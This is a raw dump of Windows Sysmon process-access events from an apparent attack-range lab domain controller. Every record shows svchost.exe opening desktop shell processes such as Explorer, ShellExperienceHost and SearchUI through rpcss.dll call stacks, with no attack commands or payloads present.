08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052892Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052891Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052890Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052889Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052888Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052887Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052886Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052885Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052884Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052883Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052882Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052881Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052880Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052879Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052878Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052877Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052876Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052875Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052874Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052873Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052872Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052871Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052870Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052869Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052868Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052867Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052866Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052865Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052864Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052863Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052862Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052861Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 